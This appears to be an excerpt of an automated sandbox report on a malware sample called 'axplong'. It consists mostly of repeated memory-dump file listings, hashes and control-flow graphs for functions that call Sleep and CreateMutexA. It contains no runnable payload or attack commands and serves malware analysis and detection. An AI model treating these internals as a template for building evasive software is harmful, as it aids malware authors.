                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                    • String ID: $2m
                                                                                                                                                                                                                                                    • API String ID: 1464230837-511082170
                                                                                                                                                                                                                                                    • Opcode ID: 90ed7fd4fd3ae6fb9654a02fe479814562595029733c6565f145e42346948466
                                                                                                                                                                                                                                                    • Instruction ID: 3b17ff2ffd028cc02af983403c4497efcae602b7f2f210567aec14a76a88eb18
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90ed7fd4fd3ae6fb9654a02fe479814562595029733c6565f145e42346948466
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0312931B111009BEB18ABB8D8887ADB7639FC6324F24821DE418DB3D6D77599808763
                                                                                                                                                                                                                                                    Function 0067A47D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 164 67a47d-67a49d 168 67a49f-67a4ab 164->168 169 67a4cb-67a4e7 164->169 170 67a4c1-67a4c8 call 68d593 168->170 171 67a4ad-67a4bb 168->171 172 67a515-67a534 169->172 173 67a4e9-67a4f5 169->173 170->169 171->170 176 67a874-67a87e call 6a6b9a * 2 171->176 174 67a536-67a542 172->174 175 67a562-67a846 call 687f30 172->175 178 67a4f7-67a505 173->178 179 67a50b-67a512 call 68d593 173->179 180 67a544-67a552 174->180 181 67a558-67a55f call 68d593 174->181 195 67a883-67a8c4 Sleep CreateMutexA 176->195 196 67a87e call 6a6b9a 176->196 178->176 178->179 179->172 180->176 180->181 181->175 198 67a8d7-67a8d8 195->198 199 67a8c6-67a8c8 195->199 196->195 199->198 200 67a8ca-67a8d5 199->200 200->198
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0067A893
                                                                                                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,006D3224), ref: 0067A8B1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                    • String ID: $2m
                                                                                                                                                                                                                                                    • API String ID: 1464230837-511082170
                                                                                                                                                                                                                                                    • Opcode ID: e6ac2a0290b07f9896cee604e5dd42c8a056bfdc801718d360974bcdb36a56c5
                                                                                                                                                                                                                                                    • Instruction ID: 8ca444cb87db0a46b5e951224a1827148281e017678725f37c6b035af2f1acb8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6ac2a0290b07f9896cee604e5dd42c8a056bfdc801718d360974bcdb36a56c5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A312731B001009BEB18ABB8D988BADB7639FC6324F24861DE4189B3D5D77599818763
                                                                                                                                                                                                                                                    Function 0067A5B2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 202 67a5b2-67a5d2 206 67a5d4-67a5e0 202->206 207 67a600-67a61c 202->207 208 67a5f6-67a5fd call 68d593 206->208 209 67a5e2-67a5f0 206->209 210 67a61e-67a62a 207->210 211 67a64a-67a669 207->211 208->207 209->208 212 67a879-67a87e call 6a6b9a 209->212 214 67a640-67a647 call 68d593 210->214 215 67a62c-67a63a 210->215 216 67a697-67a846 call 687f30 211->216 217 67a66b-67a677 211->217 230 67a883-67a8c4 Sleep CreateMutexA 212->230 231 67a87e call 6a6b9a 212->231 214->211 215->212 215->214 222 67a68d-67a694 call 68d593 217->222 223 67a679-67a687 217->223 222->216 223->212 223->222 234 67a8d7-67a8d8 230->234 235 67a8c6-67a8c8 230->235 231->230 235->234 236 67a8ca-67a8d5 235->236 236->234
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0067A893
                                                                                                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,006D3224), ref: 0067A8B1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                    • String ID: $2m
                                                                                                                                                                                                                                                    • API String ID: 1464230837-511082170
                                                                                                                                                                                                                                                    • Opcode ID: 0faac425302f7e16655dd590ce3e87381e11d68b48222cf0bcc8025354435d0e
                                                                                                                                                                                                                                                    • Instruction ID: a0a2412355bf9240a6a753755e30cf80bdb16d87af1d8c628082830450f66bb6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0faac425302f7e16655dd590ce3e87381e11d68b48222cf0bcc8025354435d0e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA312931B001009BEB18ABB8DD88BADB7639FC5324F24C25DE4189B7D5C73599818763
                                                                                                                                                                                                                                                    Function 00679A0C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 238 679a0c-679a18 239 679a2e-679cc1 call 68d593 call 687870 call 675b20 call 678a60 call 688150 call 687870 call 675b20 call 678a60 call 688150 238->239 240 679a1a-679a28 238->240 240->239 241 67a847 240->241 243 67a883-67a8c4 Sleep CreateMutexA 241->243 244 67a847 call 6a6b9a 241->244 249 67a8d7-67a8d8 243->249 250 67a8c6-67a8c8 243->250 244->243 250->249 252 67a8ca-67a8d5 250->252 252->249
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0067A893
                                                                                                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,006D3224), ref: 0067A8B1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                    • String ID: $2m
                                                                                                                                                                                                                                                    • API String ID: 1464230837-511082170
                                                                                                                                                                                                                                                    • Opcode ID: e95857f921c2b443cef14e88efe319d51790baf5d4a02313811c5813671085da
                                                                                                                                                                                                                                                    • Instruction ID: 7da11701ab73c946b47945c5b6486f49270627c87987600976bf13d4e60839ef
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e95857f921c2b443cef14e88efe319d51790baf5d4a02313811c5813671085da
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9214C31B152009BEB189B68DC89BACB7A3DFC5320F20832EE41C9B7D5D73599818763
                                                                                                                                                                                                                                                    Function 0067A27F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 283 67a27f-67a28b 284 67a2a1-67a2ca call 68d593 283->284 285 67a28d-67a29b 283->285 291 67a2cc-67a2d8 284->291 292 67a2f8-67a846 call 687f30 284->292 285->284 286 67a86a 285->286 288 67a883-67a8c4 Sleep CreateMutexA 286->288 289 67a86a call 6a6b9a 286->289 298 67a8d7-67a8d8 288->298 299 67a8c6-67a8c8 288->299 289->288 293 67a2ee-67a2f5 call 68d593 291->293 294 67a2da-67a2e8 291->294 293->292 294->286 294->293 299->298 302 67a8ca-67a8d5 299->302 302->298
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0067A893
                                                                                                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,006D3224), ref: 0067A8B1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
